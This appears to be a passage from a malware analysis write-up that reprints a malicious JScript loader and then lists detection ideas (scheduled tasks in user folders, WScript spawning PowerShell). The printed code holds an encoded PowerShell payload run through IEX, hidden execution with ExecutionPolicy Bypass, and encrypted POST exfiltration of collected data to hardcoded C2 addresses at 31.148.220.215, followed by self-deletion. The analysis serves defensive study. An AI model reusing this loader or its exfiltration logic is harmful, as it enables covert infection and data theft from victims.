hckpDb1NKRUd4UG9qWVY2cjg3Z3YxK3FjUDNoU0hFT3RGTHc4UkE5djc4QXRGa2hmcVJSdjd5b3R3TERrdmhsRUtNVHhGdFlkS2pZa1JJc3NSY3ZVR29XendGZDhqdW81eEtSR29OdmgzWHJrYkNXa2dGamVNVkhIeXRMSlJGWFhBdWpKVkF0U2tvMHgyNzczc0lwN0laa2Y0RlJINlBoQndMYkJkdU53aUFhZXV6OS9BMkJRY05nWjliOExHaGJFZXJrOXdmWVRySTF3UGNSMVZOTk5waVFHd2VqWVBCTDBSL2JqcjQvbVBmL3p5bi8venkxOEh1YnpvNmZDV1RaMS9UMW43eDFlcHp2Lyt6L25ZVHRmcTd6Ky8rdU9iZi9zZHQvNllIL25IQi8vNys4L1pPUFVVOVBXMTFEUHJ1dmJQTjI3OStmUnV2LzNYNy85MmlELzhQOFB2NDY0R2VmcnpzOTkrK2V1cVN2L2ZEcjRuL1B6VGQxTlp0c1BjMy83OTlMNm50L3ZibisvbWUwN01Iei83NDh4Ly8vR1hIN09SNnhmcUhpN1haSC81aTlyWCtuVXMzN01mUi9WN2VNblY1Mkx3K2E5M0ovenljd0x6NzltTC8reFF2L3p4VjcvKzk2OC9GdjNKejhrWGYvMWpDLzRQCidACiREZWZsYXRlZFN0cmVhbSA9IE5ldy1PYmplY3QgSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbShbSU8uTWVtb3J5U3RyZWFtXVtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkRW5jb2RlZENvbXByZXNzZWRGaWxlKSxbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcyk7CiRVbmNvbXByZXNzZWRGaWxlQnl0ZXMgPSBOZXctT2JqZWN0IEJ5dGVbXSg2MzE0OSkKJERlZmxhdGVkU3RyZWFtLlJlYWQoJFVuY29tcHJlc3NlZEZpbGVCeXRlcywgMCwgNjMxNDkpIHwgT3V0LU51bGwKKFtUZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRVbmNvbXByZXNzZWRGaWxlQnl0ZXMpKSB8IElFWAo=";
 var jsLoaderPS1 = "59d76612d0bf51.62744684.ps1"; 
 var jsLoaderRunDir = "{453359DE-4049-82E2-E58D-F96EEF430F04}";
 
 var fldr = sh.ExpandEnvironmentStrings("%HOMEPATH%") + "\\" + jsLoaderDir + "\\" + jsLoaderRunDir;
 
 if (fso.FolderExists( sh.ExpandEnvironmentStrings("%WINDIR%") + "\\SysWOW64" ))
       var powershell_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"; 
    else 
        var powershell_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";

 var p = fldr + "\\" + jsLoaderPS1; 
 
 var vers = "3";
 var uuid = "1";
 var com_pref = "oc06";
 var botSufx = "_oOG4DHP3g";
 var kkid = "203";
 var alfIn  = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
 var alfOut = "Dt4bzk9T0fOQVvo2Mw1JgnZR5PhFaBG3cYWiUAjHNIdXCql8rspSLEuy7x6mKe";
 var sepr = "%SEPR%";
 var botId = cuid() + botSufx;
 botId = vers + "-" + uuid + "-" + com_pref + "-" + botId;
 var urlArr = [];
 urlArr[0] = "http://31.148.220.215:80/cd";
urlArr[1] = "http://31.148.220.215:443/cd";
urlArr[2] = "http://31.148.220.215:8080/cd";
urlArr[3] = "http://31.148.220.215:53/cd";
urlArr[4] = "google.com";

 
 pausecomp( 2 * 60 * 1000 );
 
 var f = fso.OpenTextFile(p,2,1);
 f.Write( b64dec(PS1Body) );
 f.Close(); 

 cmd = powershell_pthpath + ' -version 2.0 -NoP -NonI -ExecutionPolicy Bypass -WindowStyle Hidden -File "' + p + '"';
 sh.Run(cmd, 0, false);
 
 pausecomp( 5 * 60 * 1000 );
 try{ fso.DeleteFile(p, true); }catch(e){}
 
 var usrName = sh.ExpandEnvironmentStrings("%USERNAME%");
 p = sh.ExpandEnvironmentStrings("%APPDATA%") + "\\" + usrName + ".ini"; 
 var outData = readFile(p); 

 try{ fso.DeleteFile(p, true); }catch(e){} 
 var contentsHtml = "";

 outData = b64enc(outData);
 outData = "stels" + sepr + outData;
 var entry = randomParamName();
 var v = encodeURI(SimpleEncrypt(outData))
 contentsHtml = downLoadUrl("POST", urlArr, randomUrl(botId), entry + "=" + v);
 
 fso.DeleteFile(WScript.ScriptFullName, true); 
}catch(e){}
*/}).toString().slice(16,-4);

try {
 lalala();
} catch(e) {
 eval(evalString); 
}

The payload is dropped from the IP  31.148.220.215/cd as can be seen in the script above.

To detect this threat, as it has a very unique Schedule Task, can be detected checking all the schedule tasks with the string "user\", where the maliciuos script is allocated. For example, the following PowerShell command could be executed with a script across different system




What other useful Use Cases can be used to detect this threat?

Any JS script executed using a TXT file is an anormal behaviour, for example:





Any Wscript command spawing PowerShell



Any created schedule tasks which uses a file from a user directory





The technique of embedding malicious code in office document via OLE objects is not new at all. Monitoring the processes created by office applications or WScript commands executed is a good source of spotting malicious activity. The schedule tasks in user space is also a good source of potential maliciuos activity.